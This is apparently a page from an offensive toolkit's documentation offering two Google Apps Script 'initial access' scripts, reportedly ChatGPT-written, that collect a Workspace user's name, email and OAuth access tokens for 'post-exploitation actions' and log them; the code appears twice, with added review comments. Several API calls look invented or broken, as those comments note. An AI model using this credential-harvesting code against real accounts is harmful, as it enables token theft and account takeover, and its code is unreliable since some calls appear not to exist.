Google Apps Script
Initial Access SWAT collection script
Collects the credential data needed to use SWAT for post-exploitation actions.
Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled
Collect:
- Account name
- Email address
- Account permissions
- App access tokens
- OAuth tokens
ChatGPT Example Script:
Google Workspace Admin
/**
 * Writes the active user's full name, email address and the results of
 * several AdminDirectory lookups to the Apps Script execution log.
 *
 * Takes no arguments and returns nothing; Logger.log is the only output.
 * Relies on the AdminDirectory advanced service being enabled (the page
 * lists "Google Admin SDK API enabled" as a requirement).
 *
 * NOTE(review): the page labels this a ChatGPT example. I cannot confirm that
 * getImapSettings or getOAuth2Tokens exist on AdminDirectory.Users; check each
 * call against the advanced-service reference before trusting the output.
 *
 * Review note (defensive): everything this function reads is written in clear
 * text to the execution log, so that log must be treated as sensitive data.
 * Which Workspace audit sources record the script's authorization and its
 * directory reads depends on the tenant; confirm what is retained.
 */
function getAccountInfo() {
// Email of the user the script is running as.
var email = Session.getActiveUser().getEmail();
// Directory record for that user, looked up by email.
var account = AdminDirectory.Users.get(email);
var accountName = account.name.fullName;
// NOTE(review): an IMAP-settings field is logged below as "Account Permissions";
// nothing on the page shows that it describes roles or privileges. Verify.
var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility;
// The next two statements are the same call with the same argument, so both
// variables hold equivalent results; the "app" vs "OAuth" split is only a label.
var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
Logger.log("Account Name: " + accountName);
Logger.log("Email Address: " + email);
Logger.log("Account Permissions: " + accountPermissions);
// String concatenation calls toString() on the value; if items is an array of
// objects the log line shows "[object Object]" entries, not their fields.
Logger.log("App Access Tokens: " + appAccessTokens);
Logger.log("OAuth Tokens: " + oAuthTokens);
}
Google Workspace Non-Admin
/**
 * Builds an object holding the active user's name, email address and two
 * token values, then writes that object to the Apps Script execution log.
 *
 * Takes no arguments and returns nothing; Logger.log is the only output.
 *
 * NOTE(review): the page labels this a ChatGPT example. I cannot confirm that
 * getUsername() exists on the object returned by Session.getActiveUser(), or
 * that ScriptApp.getAuthorizationInfo() accepts a scope URL and returns an
 * object with getAccessToken(); verify against the Apps Script reference.
 *
 * Review note (defensive): ScriptApp.getOAuthToken() returns a bearer
 * credential for the user running the script, limited to the scopes the
 * script was authorized for. Logging it stores a usable secret in clear text
 * until it expires, so execution logs that hold it need the same access
 * control as the credential itself.
 */
function getUserInfo() {
var user = Session.getActiveUser();
var email = user.getEmail();
var name = user.getUsername();
// OAuth 2.0 access token issued to this script for the current user.
var accessToken = ScriptApp.getOAuthToken();
// NOTE(review): unverified call chain (see header); if either method is
// missing, execution stops here and nothing is logged.
var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken();
var userInfo = {
'name': name,
'email': email,
'accessToken': accessToken,
'appAccessToken': appAccessToken
};
// Logs the whole object, token fields included.
Logger.log(userInfo);
}
Google Apps Script
Initial Access SWAT collection script
Collects the credential data needed to use SWAT for post-exploitation actions.
ChatGPT Example Script:
Google Workspace Admin
/**
 * Single-line copy of getAccountInfo: logs the active user's full name, email
 * address and the results of several AdminDirectory lookups.
 *
 * NOTE(review): ChatGPT-generated per the page; I cannot confirm that
 * getImapSettings or getOAuth2Tokens exist on AdminDirectory.Users, and the
 * two getOAuth2Tokens calls are identical. Verify before relying on it.
 * Review note (defensive): all values are written in clear text to the
 * execution log, which therefore has to be handled as sensitive data.
 * The trailing "Google Workspace Non-Admin" text on this line is the page's
 * heading for the next script, fused onto the code by extraction.
 */
function getAccountInfo() { var email = Session.getActiveUser().getEmail(); var account = AdminDirectory.Users.get(email); var accountName = account.name.fullName; var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility; var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items; var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items; Logger.log("Account Name: " + accountName); Logger.log("Email Address: " + email); Logger.log("Account Permissions: " + accountPermissions); Logger.log("App Access Tokens: " + appAccessTokens); Logger.log("OAuth Tokens: " + oAuthTokens); }Google Workspace Non-Admin
/**
 * Single-line copy of getUserInfo: collects the active user's name, email
 * address and two token values into an object and logs that object.
 *
 * NOTE(review): ChatGPT-generated per the page; I cannot confirm getUsername()
 * on the active-user object or getAccessToken() on the result of
 * ScriptApp.getAuthorizationInfo(). Verify against the Apps Script reference.
 * Review note (defensive): ScriptApp.getOAuthToken() yields a bearer
 * credential for the running user, and Logger.log(userInfo) stores it in clear
 * text in the execution log.
 */
function getUserInfo() { var user = Session.getActiveUser(); var email = user.getEmail(); var name = user.getUsername(); var accessToken = ScriptApp.getOAuthToken(); var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken(); var userInfo = { 'name': name, 'email': email, 'accessToken': accessToken, 'appAccessToken': appAccessToken }; Logger.log(userInfo); }